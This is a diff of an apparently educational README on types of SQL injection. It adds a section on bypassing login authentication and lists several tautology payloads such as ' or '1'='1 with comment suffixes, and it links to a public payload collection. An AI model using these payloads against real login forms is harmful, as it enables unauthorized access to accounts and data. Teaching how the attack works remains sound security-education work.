cyberteach360/sql-injection/README.md

 # Types of SQL Injection
 ![sql](https://user-images.githubusercontent.com/79256105/175160165-af1189b5-f22c-41fa-8d8e-7e4e1d14da57.png)

+## Authentication Bypass(Subverting Query Logic)
+Subverting Query Login used to bypass authenticatio of login page .
+In this technique, hacker used true statement ' or 1=1 / ' or '1'='1'-- - to bypass application query or user credentials matching.
+Some True Statement Payload :

+                   ' or '1' = '1
+                   ' or '1' = '1’
+                   ' or '1' = '1 -- -
+                   ' or '1' = '1 #
+##### 👁️‍🗨️ For More Payload check payload all things github repo https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

 ## Union Base SQL Injection
 ## Method for dumping data from database using Uninon SQL Injection